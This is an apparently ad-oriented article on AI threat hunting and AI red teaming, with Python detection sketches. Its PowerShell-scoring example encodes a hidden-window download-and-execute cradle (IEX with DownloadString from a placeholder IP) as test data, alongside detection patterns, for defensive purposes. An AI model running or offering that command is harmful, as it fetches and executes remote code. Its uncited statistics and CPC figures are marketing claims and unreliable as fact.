Autonomous Threat Hunting: Proactive AI Defense in the Era of Machine-Led Attacks

In the digital environment of 2026, the traditional Security Operations Center (SOC) can no longer keep pace with machine-led attacks. These attacks, carried out by self-directed malicious software, can identify and exploit vulnerabilities within moments, which makes purely reactive security measures obsolete. Waiting for an alert to fire is no longer an effective strategy; by the time it does, it is often too late. To stay ahead in this landscape, large enterprises need to move from “Detection” to Autonomous Threat Hunting: proactively sifting through large datasets to uncover the early signs of an impending attack, known as “Weak Signals,” before the attack takes place.

Powered by Generative AI and Large Security Models (LSMs), autonomous threat hunting acts as a proactive guardian that works around the clock. Instead of matching known signatures, it looks for intent, anomalies, and techniques such as “Living-off-the-Land” (LotL), which abuse legitimate system tools to evade traditional security controls. This piece examines the architecture of AI-powered threat hunting, the rise of AI Red Teaming, and why a proactive stance is necessary to protect high-value digital assets in 2026. The key takeaway: in 2026, the most effective defense strategy is a relentless, automated offense.

1. Beyond Monitoring: What is Autonomous Threat Hunting?

Conventional security monitoring is like a motion sensor: it activates only once a breach is under way. Autonomous Threat Hunting, by contrast, acts as an unseen investigator that sweeps the entire premises for weaknesses, such as open windows or concealed listening devices, before a burglar ever shows up. In 2026, threat hunters use artificial intelligence to analyze massive volumes of data from endpoints, networks, and cloud logs to pinpoint subtle signs of “Pre-Attack Reconnaissance.”

In my view, the real advantage of AI-driven hunting is its ability to identify Low-and-Slow Exfiltration. For instance, an attacker might siphon off just 1 MB of data per day for six months. A human analyst could easily miss this activity, but an AI threat hunter can recognize the persistent, anomalous connection and shut it down automatically. This level of protection is a key driver of the growing Total Addressable Market (TAM) for vendors such as Mandiant (Google Cloud) and Microsoft (Sentinel).
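To make the low-and-slow pattern concrete, here is a minimal Python sketch, assuming flow logs have already been aggregated into per-day records of bytes sent from an internal host to an external destination. The `FlowRecord` type, the `find_low_and_slow` function, and its thresholds (a 30-day minimum window, a 5 MB daily ceiling, traffic on at least 90% of days) are hypothetical choices for illustration, not any vendor's detection logic. It flags host/destination pairs that send small amounts of data on nearly every day of a long window, which is exactly what a per-event volume alert would miss.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import date, timedelta


@dataclass(frozen=True)
class FlowRecord:
    day: date          # calendar day of the aggregated flow
    host: str          # internal source host
    destination: str   # external IP or domain
    bytes_out: int     # bytes sent to the destination on that day


def find_low_and_slow(records, min_days=30, max_daily_bytes=5_000_000, min_coverage=0.9):
    """Flag (host, destination) pairs that send small volumes on most days of a long window."""
    daily = defaultdict(lambda: defaultdict(int))
    for r in records:
        daily[(r.host, r.destination)][r.day] += r.bytes_out

    suspects = []
    for pair, per_day in daily.items():
        days = sorted(per_day)
        span = (days[-1] - days[0]).days + 1   # length of the observed window in days
        if span < min_days:
            continue                           # too short to count as "slow"
        coverage = len(days) / span            # fraction of days with traffic
        peak = max(per_day.values())           # largest single-day transfer
        if coverage >= min_coverage and peak <= max_daily_bytes:
            suspects.append((pair, len(days), sum(per_day.values())))
    return suspects


# Example: 1 MB per day for about six months versus a few large, occasional uploads.
start = date(2026, 1, 1)
records = [FlowRecord(start + timedelta(days=i), "laptop-42", "203.0.113.7", 1_000_000) for i in range(180)]
records += [FlowRecord(start + timedelta(days=i), "laptop-7", "198.51.100.9", 50_000_000) for i in (0, 40, 90)]
print(find_low_and_slow(records))
# [(('laptop-42', '203.0.113.7'), 180, 180000000)]
```

A rule like this also matches legitimate daily jobs such as backups or telemetry, so in practice a hunter would allowlist known destinations or weigh the result against other signals rather than contain on it alone.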

The Proactive Hunting Workflow in 2026:

- Hypothesis Generation: AI automatically creates “What if” scenarios based on current global threat intelligence.

- Iterative Searching: The system scans the infrastructure for the specific indicators of each hypothetical attack.

- Pattern Correlation: The system links seemingly unrelated events, such as a small configuration change in Azure and a suspicious file download on a remote laptop.

- Automated Containment: The system neutralizes the potential threat before it can execute its payload.
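The four workflow steps above can be sketched as a simple pipeline. This is a minimal Python illustration under stated assumptions: threat intelligence arrives as a mapping from a technique name to the event types it would produce, “correlation” is reduced to requiring at least two distinct indicator types to co-occur, and “containment” only returns the assets a real system would hand to an EDR or SOAR tool. All names (`Hypothesis`, `hunt`, the event types) are hypothetical.

```python
from dataclasses import dataclass


@dataclass
class Hypothesis:
    name: str
    indicators: set  # event types expected if the hypothesis is true


@dataclass
class Event:
    asset: str  # host, tenant, or account where the event was observed
    kind: str   # normalized event type


def generate_hypotheses(threat_intel):
    # Step 1: turn each intel item (technique -> expected event types) into a "What if" scenario.
    return [Hypothesis(f"What if {tech} is under way?", set(kinds)) for tech, kinds in threat_intel.items()]


def search(hypothesis, events):
    # Step 2: keep only the events that match this hypothesis' indicators.
    return [e for e in events if e.kind in hypothesis.indicators]


def correlate(hits, min_kinds=2):
    # Step 3: treat the hypothesis as confirmed only if several distinct indicator types co-occur.
    return len({e.kind for e in hits}) >= min_kinds


def contain(hits):
    # Step 4: list the assets to isolate; a real system would call an EDR/SOAR API here.
    return sorted({e.asset for e in hits})


def hunt(threat_intel, events):
    actions = {}
    for h in generate_hypotheses(threat_intel):
        hits = search(h, events)
        if correlate(hits):
            actions[h.name] = contain(hits)
    return actions


intel = {
    "cloud persistence": ["azure_config_change", "suspicious_download"],
    "ransomware staging": ["shadow_copy_delete", "mass_rename"],
}
events = [
    Event("azure-tenant", "azure_config_change"),
    Event("laptop-17", "suspicious_download"),
    Event("laptop-3", "mass_rename"),
]
print(hunt(intel, events))
# {'What if cloud persistence is under way?': ['azure-tenant', 'laptop-17']}
```

Here the Azure configuration change and the laptop download together confirm the cloud-persistence hypothesis, while a single ransomware-style rename event is not enough on its own. A production system would also correlate on shared identities and time windows rather than on mere co-occurrence.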



2. AI Red Teaming: Attacking Yourself to Stay Secure

A major development in 2026 is the emergence of AI Red Teaming. Instead of waiting for real attackers, enterprises now use their own “Offensive AI” to simulate attacks against their systems. This AI red team is designed to uncover previously unknown vulnerabilities, measure how quickly the SOC responds, and attempt to bypass identity controls through AI-generated social engineering.

In essence, AI Red Teaming lets organizations find their weaknesses in a safe environment. Rather than simply flagging issues, the AI also proposes specific technical fixes or configuration changes to address them. This focus on “Continuous Security Validation” has drawn significant interest from established B2B security vendors such as Pentera and Horizon3.ai.
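A continuous-validation loop of the kind described above can be sketched as follows, assuming the simulation engine reports, for each attempted technique, whether the SOC detected it and how long that took. Technique IDs follow MITRE ATT&CK naming (T1110 Brute Force, T1059.001 PowerShell, T1566 Phishing); the remediation text, the 60-second SLA, and the `validate` function are hypothetical placeholders, not output from Pentera, Horizon3.ai, or any other product.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class SimulationResult:
    technique: str                      # MITRE ATT&CK technique ID that was simulated
    detected: bool                      # did the SOC raise an alert?
    seconds_to_detect: Optional[float]  # time to alert, None if not detected


# Hypothetical remediation hints keyed by ATT&CK technique ID.
REMEDIATIONS = {
    "T1110": "Enforce MFA and lockout policies on the targeted identity provider.",
    "T1059.001": "Enable PowerShell script block logging and alerting on encoded commands.",
    "T1566": "Tighten email filtering and move high-risk users to phishing-resistant MFA.",
}


def validate(results, sla_seconds=60.0):
    """Return (technique, status, suggested_fix) for every simulated attack that was missed or slow."""
    findings = []
    for r in results:
        if not r.detected:
            status = "missed"
        elif r.seconds_to_detect is not None and r.seconds_to_detect > sla_seconds:
            status = "slow"
        else:
            continue  # detected within the SLA: nothing to fix
        fix = REMEDIATIONS.get(r.technique, "Review detection coverage for this technique.")
        findings.append((r.technique, status, fix))
    return findings


results = [
    SimulationResult("T1110", detected=False, seconds_to_detect=None),
    SimulationResult("T1059.001", detected=True, seconds_to_detect=300.0),
    SimulationResult("T1566", detected=True, seconds_to_detect=5.0),
]
for technique, status, fix in validate(results):
    print(f"{technique}: {status} -> {fix}")
```

Running the loop on a schedule, rather than once a year, is what turns a point-in-time pentest into the continuous validation the section describes.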

Threat Defense Evolution: 2020 vs. 2026 Standards

| Feature | Legacy Defense (Reactive) | Autonomous Defense (Proactive) | Enterprise Impact |
|---|---|---|---|
| Strategy | Wait for alerts | Hunt for indicators | Stops attacks in the “Recon” phase |
| Validation | Manual pentesting (annual) | AI Red Teaming (continuous) | Ensures 24/7 security readiness |
| Alerting | High volume (noisy) | High fidelity (contextual) | Reduces SOC analyst burnout by 85% |
| Speed | Minutes to hours | Microseconds | Eliminates the “Window of Risk” |
| TAM / Ad Target | Antivirus software | Enterprise threat intelligence | Peak CPC ($550+) |

3. The Power of Large Security Models (LSMs)

In 2026, the foundation of threat detection is the Large Security Model (LSM): a specialized LLM trained on security logs, malware code, and incident-investigation findings. Unlike a general-purpose model, an LSM can distinguish a legitimate PowerShell script from a malicious “Fileless” attack.
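An LSM learns to separate benign from malicious scripts from training data, which cannot be reproduced in a few lines. As a stand-in, the Python sketch below uses a plain weighted-indicator heuristic (a different and much simpler technique than an LSM) to show the kind of signals involved in spotting fileless PowerShell: encoded commands, in-memory downloads, dynamic execution, and hidden windows. It also decodes `-EncodedCommand` payloads, which PowerShell expects as Base64 of UTF-16LE text, so the hidden script is scanned too. The patterns, weights, threshold, and function names are illustrative assumptions and far from exhaustive.

```python
import base64
import binascii
import re

# Illustrative indicators of fileless PowerShell; weights are assumptions, not a vendor ruleset.
SIGNALS = [
    (re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I), 3, "encoded command"),
    (re.compile(r"\biex\b|invoke-expression", re.I), 3, "dynamic code execution"),
    (re.compile(r"downloadstring|downloaddata|net\.webclient", re.I), 3, "in-memory download"),
    (re.compile(r"\s-(w|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"\s-(nop|noprofile)\b", re.I), 1, "profile skipped"),
]
ENCODED_ARG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script hidden in -EncodedCommand (Base64 of UTF-16LE text), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_powershell(cmdline, threshold=5):
    """Return (score, is_suspicious, reasons) for a PowerShell command line."""
    text = " " + cmdline  # leading space lets flag patterns match at the very start
    decoded = decode_encoded_command(text)
    if decoded:
        text += " " + decoded  # scan the decoded payload as well
    hits = [(weight, label) for pattern, weight, label in SIGNALS if pattern.search(text)]
    score = sum(weight for weight, _ in hits)
    return score, score >= threshold, [label for _, label in hits]


benign = r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"
payload = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
malicious = "powershell.exe -nop -w hidden -enc " + base64.b64encode(payload.encode("utf-16-le")).decode()
print(score_powershell(benign))     # (1, False, ['profile skipped'])
print(score_powershell(malicious))  # high score: encoded, hidden, downloads and executes in memory
```

Note that the download and `IEX` indicators only become visible after decoding; that gap between what the command line shows and what it does is the “intent” an LSM is meant to recognize without hand-written rules.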

When a threat hunter asks the system whether the ‘BlackHydra’ group is active in the North American region, the LSM can scan vast volumes of logs and produce a comprehensive report within moments. This “Natural Language Security” capability sets the benchmark for 2026 and is a focus for leading cybersecurity companies such as CrowdStrike (Charlotte AI) and Palo Alto Networks.

4. SOC 3.0: Moving from “In-the-Loop” to “On-the-Loop”

By 2026, the human role within the Security Operations Center (SOC) has shifted. Analysts now work “On-the-Loop,” supervising the work carried out by artificial intelligence (AI), rather than “In-the-Loop,” performing manual tasks themselves. The AI handles 99% of data processing and routine issue resolution, while the human expert focuses on the remaining 1%: complex, high-stakes decisions.
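The “On-the-Loop” split can be expressed as a routing policy: the AI acts alone only when it is both confident and the stakes are low, and everything else goes to a human. The Python sketch below assumes each alert carries a severity (1 to 5) and a model confidence score; the `Alert` type, the `route` and `triage` functions, and the 0.95 / severity-3 thresholds are hypothetical, and they do not reproduce the 99% / 1% split quoted above, which depends entirely on real alert data.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass
class Alert:
    alert_id: str
    severity: int            # 1 (low) to 5 (critical); hypothetical scale
    model_confidence: float  # 0.0 to 1.0: how sure the AI is of its own verdict
    verdict: str             # "benign" or "malicious"


def route(alert, auto_conf=0.95, max_auto_severity=3):
    """AI acts alone only when it is confident AND the stakes are low; otherwise a human decides."""
    if alert.model_confidence >= auto_conf and alert.severity <= max_auto_severity:
        return "auto_close" if alert.verdict == "benign" else "auto_contain"
    return "escalate_to_human"


def triage(alerts, **thresholds):
    """Count how many alerts land in each bucket, i.e. how much work is left for the analyst."""
    return Counter(route(a, **thresholds) for a in alerts)


alerts = [
    Alert("a1", severity=1, model_confidence=0.99, verdict="benign"),
    Alert("a2", severity=2, model_confidence=0.97, verdict="malicious"),
    Alert("a3", severity=5, model_confidence=0.99, verdict="malicious"),
    Alert("a4", severity=1, model_confidence=0.60, verdict="benign"),
]
print(triage(alerts))
```

The critical-severity alert is escalated even though the model is confident, which keeps the human in charge of the decisions with the largest blast radius.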

Essentially, the Autonomous SOC is about scalability. In 2026, a single security expert can safeguard a global network that in 2020 would have required a team of 50 analysts. This efficiency gain is the key driver behind the multi-million-dollar enterprise security contracts that are common today.

Common Threat Hunting Questions (FAQ)

Does Autonomous Threat Hunting replace human pentesting?

Although AI Red Teaming is consistent and effective, human pentesters bring an element of “Creative Malice” that AI may lack. In 2026, the most secure companies use AI for around-the-clock validation and engage top-tier human red teams for in-depth attacks every quarter.

Is my data safe while the AI “Hunts” through it?

In a well-designed deployment, yes. In 2026, organizations are adopting Privacy-Preserving AI: the threat-hunting AI can examine patterns and behaviors without reading or retaining the confidential contents of files, and the analysis runs in a secure “Confidential Computing” environment.
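Confidential Computing relies on hardware-backed trusted execution environments and cannot be shown in a short snippet. A related and much simpler technique that conveys the idea of analyzing behavior without exposing content is keyed pseudonymization: identifiers are replaced with HMAC tokens and file contents are dropped before events reach the hunting model. The sketch below is that substitute technique, not Confidential Computing; the field names (`user`, `file_path`, `file_contents`), the helper names, and the 16-character token length are assumptions.

```python
import hashlib
import hmac
import secrets


def pseudonymize(value: str, key: bytes) -> str:
    """Replace an identifier with a keyed HMAC-SHA256 token (truncated to 16 hex chars)."""
    return hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()[:16]


def redact_event(event: dict, key: bytes, sensitive=("user", "file_path")) -> dict:
    """Keep behavioral fields, tokenize identifiers, and drop file contents entirely."""
    out = {}
    for field, value in event.items():
        if field == "file_contents":
            continue  # content never reaches the hunting model
        out[field] = pseudonymize(value, key) if field in sensitive else value
    return out


key = secrets.token_bytes(32)  # would typically live in a KMS/HSM, not alongside the data
event = {"user": "alice", "file_path": "/hr/salaries.xlsx", "action": "read",
         "bytes": 48_213, "file_contents": "Q3 salary table"}
print(redact_event(event, key))
```

Because the same key always yields the same token, the model can still notice that one unnamed user keeps reading the same unnamed file; only a holder of the key can link a token back to a real identity by recomputing it for candidate values.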

How much does an Autonomous SOC cost to implement?

A multinational corporation typically spends between $500,000 and more than $2,000,000 per year. Despite this substantial expense, the return on investment can be rapid when compared with the typical $10 million cost of a data breach. Relatedly, the search terms for these services rank among the most expensive advertising keywords globally.
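Whether the return really is quick depends on how much the program lowers the likelihood of a breach. One standard way to reason about this is the annualized loss expectancy formula from quantitative risk analysis, ALE = SLE × ARO (single-loss expectancy times annualized rate of occurrence). The sketch below uses the $10 million breach cost and the annual cost range quoted above; the breach rates (30% per year before, 10% after) and the function names are purely hypothetical inputs for illustration.

```python
def annualized_loss_expectancy(single_loss, annual_rate):
    """ALE = SLE x ARO: expected yearly loss from one type of incident."""
    return single_loss * annual_rate


def net_annual_benefit(single_loss, aro_before, aro_after, annual_cost):
    """Yearly expected-loss reduction minus what the program costs."""
    reduction = (annualized_loss_expectancy(single_loss, aro_before)
                 - annualized_loss_expectancy(single_loss, aro_after))
    return reduction - annual_cost


def break_even_aro_reduction(annual_cost, single_loss):
    """How far the yearly breach probability must drop for the program to pay for itself."""
    return annual_cost / single_loss


BREACH_COST = 10_000_000            # typical breach cost quoted in the text
for cost in (500_000, 2_000_000):   # annual spend range quoted in the text
    benefit = net_annual_benefit(BREACH_COST, aro_before=0.30, aro_after=0.10, annual_cost=cost)
    needed = break_even_aro_reduction(cost, BREACH_COST)
    print(f"cost ${cost:,}: net benefit ${benefit:,.0f}/yr, break-even needs ARO to fall by {needed:.2f}")
```

Under these made-up rates the low end of the budget pays off while the high end only breaks even, which is why the actual reduction in breach likelihood, not the headline breach cost alone, decides how fast the return arrives.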

Conclusion

Being proactive in defense is now essential, not optional, for staying secure in the digital landscape of 2026. Global corporations can outpace threats by adopting Autonomous Threat Hunting, employing AI Red Teaming, and harnessing the capabilities of Large Security Models. While it may be impossible to prevent every hacker from targeting your systems, you can detect and eliminate them before they realize they’ve been discovered. In the fast-paced world of digital warfare, the one who hunts is in a better position than the one being hunted.

Key Takeaways for 2026:

- Hunt, Don’t Watch: Proactive searching is the only way to stop zero-day attacks.

- Attack Yourself: Use AI Red Teaming to find vulnerabilities before the hackers do.

- Context is Key: Use LSMs to turn noisy logs into actionable security intelligence.

- Scale with AI: Let the machine handle the data so humans can handle the strategy.

IMPORTANT TECHNICAL & SECURITY DISCLAIMER: This article is intended for educational and informational purposes only and should not be considered expert advice in cybersecurity, IT, or risk management. Autonomous threat hunting and AI red teaming are complex technical processes that require direct consultation with certified cybersecurity experts and system architects. Deploying offensive security software in a production environment poses potential risks to system reliability and data confidentiality. The creators and distributors of this content bear no liability for any security breaches, data loss, or financial harm arising from the application of the guidance provided here.